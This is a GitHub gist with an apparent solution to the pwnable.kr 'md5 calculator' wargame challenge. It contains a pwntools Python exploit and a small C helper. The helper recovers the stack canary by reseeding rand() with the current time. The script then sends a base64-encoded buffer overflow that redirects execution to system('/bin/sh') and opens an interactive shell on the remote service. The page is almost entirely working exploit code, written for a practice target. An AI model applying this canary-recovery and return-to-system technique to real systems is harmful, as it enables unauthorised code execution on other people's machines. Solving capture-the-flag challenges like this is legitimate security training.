Skip to content

Instantly share code, notes, and snippets.

@cubarco

cubarco/pwnable-rookiss-md5-exp.py

Created March 15, 2016 14:41
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save cubarco/30cf8bb7ab3fc79534f3 to your computer and use it in GitHub Desktop.
Save cubarco/30cf8bb7ab3fc79534f3 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
pwnable-rookiss-md5-exp.py
#!/usr/bin/env python
# coding=utf8
from pwn import process, p32, remote
from base64 import b64encode
from time import time
from subprocess import check_output
system = 0x8049187
buf = 0x804B0E0
# p = process('./hash')
p = remote('pwnable.kr', 9002)
p.recvuntil('captcha : ')
captcha = int(p.recvline()[:-1])
p.sendline(str(captcha))
# adjust to pwnable.kr
timenow = int(time()) - 2
canary = int(check_output(['./getcanary', str(timenow), str(captcha)]))
canary &= 0xffffffff
print '[*] canary: ' + hex(canary)
payload = 'A' * 512 + p32(canary) + 'A' * 12
payload += p32(system)
payload += p32(buf + 1 + len(b64encode(payload + p32(0))))
enc = b64encode(payload) + '\x00/bin/sh' # for system() too
p.sendline(enc)
p.interactive()
Raw
pwnable-rookiss-md5-getcanary.c
#include <stdio.h>
#include <stdlib.h>
int main(int argc, char *argv[])
{
if (argc != 3)
return -1;
int i;
int canary;
int seed = strtol(argv[1], NULL, 10);
int captcha = strtol(argv[2], NULL, 10);
int rands[8];
srand(seed);
for (i=0; i<=7; i++)
rands[i] = rand();
canary = captcha - rands[1] - rands[5] - rands[2] + \
rands[3] - rands[7] - rands[4] + rands[6];
printf("%d\n", canary);
return 0;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment